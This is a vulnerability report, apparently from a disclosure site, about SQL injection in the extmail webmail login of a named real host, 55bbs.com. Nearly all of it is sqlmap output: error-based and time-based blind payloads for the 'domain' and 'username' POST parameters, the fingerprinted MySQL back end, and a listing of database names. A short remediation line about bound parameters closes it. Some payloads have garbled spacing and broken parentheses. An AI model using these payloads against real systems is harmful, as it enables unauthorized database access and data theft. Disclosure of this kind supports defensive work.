55bbs email system: SQL injection — the request parameters require filtering
55bb mail system SQL Injection injection link: http://pop3.55bbs.com/extmail/cgi/index.cgihttp://smtp.55bbs.com/extmail/cgi/index.cgi Injection Parameter: domain (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin & password = 2121 & domain = 55bbs.com 'AND (SELECT 2116 FROM (select count (*), CONCAT (0x7162716a71, (SELECT (ELT (2116 = 2116, 1 ))), 0x71787a6b71, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) AND 'mtie '= 'mtie & nosameip = onParameter: username (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin' AND (SELECT 8134 FROM (select count (*), CONCAT (0x7162716a71, (SELECT (ELT (8134 = 8134,1), 0x71787a6b71, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND 'thua '= 'thua & password = 2121 & domain = 55bbs.com & nosameip = onType: AND/OR time-based blintitle: MySQL> = 5.0.12 AND time-based blind (SELECT) payload: username = admin' AND (SELECT * FROM (SELECT (SLEEP (5) XEQZ) AND 'dgqg' = 'dgqg & password = 2121 & domain = 55bbs.com & nosameip = on
Parameter: domain (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin & password = 2121 & domain = 55bbs.com 'AND (SELECT 3084 FROM (select count (*), CONCAT (0x7170767671, (SELECT (ELT (3084 = 3084,1), 0x716b627671, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND 'ekhn '= 'ekhn & nosameip = onType: AND/OR time-based blintitle: MySQL> = 5.0.12 AND time-based blind (SELECT) Payload: username = admin & password = 2121 & domain = 55bbs.com 'AND (SELECT * FROM (SELECT (SLEEP (5) LJhz) AND 'vps' = 'vps' & nosameip = onParameter: username (POST) Type: error-basedTitle: MySQL> = 5.0 AND error-based-WHERE, HAVING, order by or group by clausePayload: username = admin' AND (SELECT 7724 FROM (select count (*), CONCAT (0x7170767671, (SELECT (ELT (7724 = 7724,1), 0x716b627671, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) AND 'aqvk' = 'aqvk & password = 2121 & domain = 55bbs.com & nosameip = onType: AND/OR time-based blintitle: MySQL> = 5.0.12 AND time-based blind (SELECT) Payload: username = admin' AND (SELECT * FROM (SELECT (SLEEP (5 ))) gwoO) AND 'ezmf '= 'ezmf & password = 2121 & domain = 55bbs.com & nosameip = on --- there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: domain, type: Single quoted string (default) [1] place: POST, parameter: username, type: single quoted string [q] Quit> 0 [17:03:12] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: mySQL 5.0 [17:03:12] [INFO] fetching database names [17:03:12] [INFO] the SQL query used returns 3 entries [17:03:12] [INFO] resumed: information_schema [17:03:12] [INFO] resumed: extmail [17:03:12] [INFO] resumed: testavailable databases [3]: [*] extmail [*] information_schema [*] test
Solution:
Validate and filter the `username` and `domain` POST parameters before they reach the database, and pass them to the query as bound parameters rather than concatenating them into the SQL string.